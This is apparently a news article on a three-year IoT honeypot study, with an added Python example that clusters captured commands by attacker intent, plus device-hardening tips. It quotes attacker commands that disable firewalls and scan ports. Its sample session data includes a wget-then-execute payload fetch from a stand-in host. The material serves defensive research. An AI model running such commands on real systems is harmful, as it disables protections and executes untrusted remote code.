Honeypot Experiments Reveal What Hackers Want from IoT Devices

news

A three-year honeypot experiment that simulated various types of vulnerable IoT devices has revealed why actors target certain devices, according to a new study.

https://arxiv.org/pdf/2112.10974.pdf

Analysis of the information obtained in this study shows that adversaries are actively looking for vulnerable IoT devices.
We show that a multifaceted and multi-stage approach can capture the activities of increasingly sophisticated attackers compared to a one-time honeypot.

In addition, our analysis of HoneyCamera logs shows that IoT camera devices are an interesting target for attacks.

The study also presents a clustering approach for making sense of the large number of commands captured by the honeypots, together with a grouping algorithm that uses the resulting clusters of commands to infer the attacker’s intent and mode of operation.

More specifically, the honeypot was intended to create a sufficiently diverse ecosystem to cluster the generated data in such a way as to determine the adversary’s goals.

Internet of Things (IoT) devices are an expanding market that includes cameras, lighting, doorbells, smart TVs, motion sensors, speakers, thermostats, and other small devices connected to the Internet.

By 2025, more than 40 billion of these devices will be connected to the Internet, providing an entry point and resource into the network and being used as part of illicit crypto mining and DDoS attacks.

Setting up the honeypot

The honeypot ecosystem, built by researchers at NIST and the University of Florida, consists of three elements: server farms, screening systems, and data collection and analysis infrastructure.

We also installed ready-made IoT honeypot emulators Cowrie, Dionaea, KFSensor, and HoneyCamera to build a diverse ecosystem.

We’ve configured these instances to appear as real devices on Censys and Shodan, two specialized search engines that search for Internet-connected services.

There were three main types of honeypots.

  • HoneyShell – emulates Busybox
  • HoneyWindowsBox – emulates IoT devices running Windows
  • HoneyCamera – emulates various IP cameras such as Hikvision and D-Link

What is novel in this experiment is that the honeypot was adjusted in response to the attackers’ traffic and attack methods.

We used the collected data to modify the IoT configuration and defenses, and collected new data reflecting the attacker’s response to those changes.

Survey results

This experiment yielded a huge volume of data, 22.6 million in total, the majority of which targeted the HoneyShell honeypots.

The reason why various attackers showed similar attack patterns is because they had a common goal and means to achieve it.

For example, many attackers run commands such as “masscan” to scan for open ports, and “/etc/init.d/iptables stop” to disable the firewall.

Attackers also ran “free -m”, “lspci | grep VGA”, and “cat /proc/cpuinfo”, all three of which are intended to gather hardware information about the target device.

Interestingly, there were nearly 1 million attempts to use the username and password combination “admin / 1234”, reflecting the heavy use of this credential in IoT devices.

As for the ultimate purpose of the attacks, we found that those against “HoneyShell” and “HoneyCamera” mainly aimed at recruiting the devices for DDoS attacks, and that these honeypots were often infected with Mirai variants and coin miners.

In Windows honeypots, coin miner infections were observed most frequently, followed by viruses, droppers, and Trojans.

In the case of HoneyCamera, the researchers intentionally introduced a vulnerability that exposed credentials, and noticed that 29 attackers manually exploited it.

Only 314,112 (13%) unique sessions were detected that successfully executed at least one command in the honeypot.

This result indicates that only a small percentage of attacks proceeded to the next step; the remaining 87% were just trying to find the correct username and password combination.
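The kind of analysis described above, grouping captured commands into intent clusters and measuring how many sessions got past the login stage, can be reproduced on a small scale. The following is an added example, not code from the paper or the article; the session records are constructed, and the intent labels and regexes are our own rather than the study’s taxonomy.

```python
import re
from collections import Counter

# Constructed sample of Cowrie-style honeypot session records (not real captures).
# Each record: session id, the credential pair tried, and the commands executed.
SESSIONS = [
    {"id": "s1", "login": ("admin", "1234"),
     "commands": ["cat /proc/cpuinfo", "free -m", "lspci | grep VGA"]},
    {"id": "s2", "login": ("admin", "1234"), "commands": []},
    {"id": "s3", "login": ("root", "root"),
     "commands": ["/etc/init.d/iptables stop", "masscan -p23 203.0.113.0/24"]},
    {"id": "s4", "login": ("admin", "1234"), "commands": []},
    {"id": "s5", "login": ("root", "admin"),
     "commands": ["wget http://example.invalid/x.sh", "./x.sh"]},
]

# Intent clusters: regexes over command text. Labels are our own (hypothetical)
# categories for the behaviours the article describes, not the paper's clusters.
INTENT_PATTERNS = {
    "hardware_recon": [r"^cat /proc/cpuinfo", r"^free -m", r"^lspci\b.*VGA"],
    "defense_evasion": [r"iptables stop", r"^ufw disable"],
    "scanning": [r"^masscan\b", r"^nmap\b"],
    "payload_fetch": [r"^(wget|curl)\b", r"^tftp\b"],
}

def classify(command):
    """Return the intent label for one command, or 'unknown' if none matches."""
    for label, patterns in INTENT_PATTERNS.items():
        if any(re.search(p, command) for p in patterns):
            return label
    return "unknown"

def session_intents(session):
    """Set of intent labels observed across all commands of one session."""
    return {classify(c) for c in session["commands"]}

def summarize(sessions):
    """Aggregate the statistics the study reports: share of sessions that ran
    at least one command, most-tried credential pair, and intent counts."""
    executed = [s for s in sessions if s["commands"]]
    creds = Counter(s["login"] for s in sessions)
    intents = Counter(label for s in executed for label in session_intents(s))
    return {
        "sessions": len(sessions),
        "executed_share": len(executed) / len(sessions),
        "top_credential": creds.most_common(1)[0],
        "intents": dict(intents),
    }
```

On the constructed sample, 3 of 5 sessions executed a command and “admin / 1234” is the most-tried credential, mirroring the proportions the article reports at a much larger scale.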

How to protect your device

To prevent hackers from hijacking your IoT device, please take the following basic steps.

  • Change the default account credentials to unique, strong (long) ones.
  • Set up a separate network for IoT devices and keep them isolated from critical assets.
  • Apply firmware and other security updates as soon as they become available.
  • Proactively monitor IoT devices to detect signs of abuse.

Most importantly, devices that do not need to be connected to the Internet should be placed behind a firewall or VPN to prevent unauthorized remote access.
